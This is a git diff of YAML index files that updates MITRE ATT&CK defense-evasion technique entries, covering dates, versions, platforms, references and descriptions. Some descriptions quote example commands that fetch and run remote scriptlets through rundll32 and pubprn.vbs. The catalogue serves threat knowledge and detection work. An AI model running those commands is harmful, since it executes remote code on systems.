         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -62887,6 +63751,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/containers-index.yaml b/atomics/Indexes/containers-index.yaml
index 1ecd5e12c3..3abf1f8c40 100644
--- a/atomics/Indexes/containers-index.yaml
+++ b/atomics/Indexes/containers-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
